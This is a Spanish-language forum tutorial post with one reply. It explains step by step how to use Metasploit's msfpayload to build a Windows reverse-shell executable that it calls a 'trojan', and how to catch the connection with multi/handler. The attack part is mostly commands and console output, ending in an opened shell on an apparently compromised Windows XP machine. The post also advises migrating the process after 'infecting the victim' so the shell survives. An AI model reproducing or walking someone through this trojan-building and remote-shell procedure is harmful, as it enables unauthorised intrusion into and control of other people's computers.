+Temario
-+¿Reverse Shell?
-+¿Payload binario(.EXE)?
-+Configurancion y compilacion
-+Estudiando la configuracion
-+¿Multi/handler?
-+Configuracion y "escuchando"
-+Conclusion
  • Bueno ya emos visto como backdorear un binario
    pero no emos visto como podemos hacer un payload
    binario y que quiero decir con esto? Me refiero a que
    no ejecute nada mas que nuestro payload.

+¿Reverse Shell?

  • Bueno repasemos como el nombre nos dice
    un reverse shell es una shell reversa y esto
    funciona asi en lugar de que nosotro busquemos
    la shell, la shell nos busca a nosotro como un "troyano"
    obvio al puro stylo de msf jejejejj XD !!

+¿Payload binario(.EXE)?

  • Bien asi como suena aremos nuestro payload binario
    esto quiere decir que sera un ejecutable que solo contendra
    nuestra payload selecionada previamente jejejje
    "Troyano al stylo msf"
+Configurancion y compilacion
  • Bueno vamos a poner un reverse tcp como payload y lo compilaremos
    poniendo nuestro puerto a usar y nuestra payload selecionada yo usare
    esta pero ustedes pueden usar cualquier otra les recuerdo el comando
    search en msf o show payloads ...

    vamos a la carpeta donde tenemos nuestro msf y tecleamos

Código: Seleccionar todo

shiva-sheva@cracker:~/metasploit$ sudo ./msfpayload windows/shell_reverse_tcp LHOST=187.152.162.199 LPORT=666 X > /home/shiva-sheva/pay.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: LHOST=187.152.162.199,LPORT=666
shiva-sheva@cracker:~/metasploit$ 
+Estudiando la configuracion
  • sudo ./msfpayload: Llamamos a msfpayload con derechos sudo
    windows/shell_reverse_tcp: Ruta de nuestro payload
    LHOST=187.152.162.199: Nuestra ip
    LPORT=666: Puerto que usaremos
    X > /home/shiva-sheva/pay.exe: Indicamos que sera ejecutable y la ruta donde queremos guardarlo!
+¿Multi/handler?
  • Bueno handler lo podremos definir como un tipo de
    listener configurable a nuestro antojo para poder
    esuchar conexiones que nos quieran hacer es decir...
    Si enviamos nuestro payload binario a una victima podamos
    recibir la conexion de lo conotrario no se podra!!!

    IMPORTANTE:Cuando aya infectado a la victima recuerde usar migrate
    para poder migrar el proceso y nunca muero nuestra shell inversa o
    por lo menos que dure mas tiempo....
+Configuracion y "escuchando"
  • Bueno ahora lanzaremos el handler para poder escuchar la conexion
    y poder "interceptarla" vamos a la shell y escribimos...

Código: Seleccionar todo

shiva-sheva@cracker:~/metasploit$ sudo ./msfconsole
  • Llamamos a msfconsole
    dentro de ella damos

Código: Seleccionar todo

msf > use exploit/multi/handler
  • Ahora tenemos que indicar el payload que usamos!

Código: Seleccionar todo

msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
  • Ok todo perfecto hasta ahora ahora vamos a ver las opciones que tenemos que configurar...

Código: Seleccionar todo

msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Wildcard Target
  • Indicamos LHOST que es nuestra ip e indicamos el LPORT que es el puerto

Código: Seleccionar todo

msf exploit(handler) > set LHOST 187.152.162.199
LHOST => 187.152.162.199
msf exploit(handler) > set LPORT 666
LPORT => 666
  • Podemos proceder a lanzarlo de esta forma!

Código: Seleccionar todo

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
  • Y si es que ya abrio nuestro troyano al stylo msf nos saldra esto

Código: Seleccionar todo

[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (187.152.162.199:666 -> xxx.xx.xxx.243:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\BY-K4RL\My Documents>
  • Bueno puse los xxx.xxx.xxx.xxx para proteger los datos del onweado jejejej
    y bueno asi se simple es el pentest ustedes saben si se la complican o no!

+Conclusion

  • Bueno vimos algo interesante esta vez ya sabes
    como hacer nuestro troyanos al mero estylo de msf
    jejeje y bueno esperen la parte VIII veremos algo
    muy importante para complementar esta parte!Saludos!
¡En el pen-testing el eslabon mas debil es el usuario!
Muy bueno, como siempre.

Para los usuarios de windows, pueden usar el netcat para escuchar la conexión. (Eso es lo que yo hacía xD)

Espero la parte 8!!

Saludos!
github.com/Slek-Z
Responder

Volver a “General”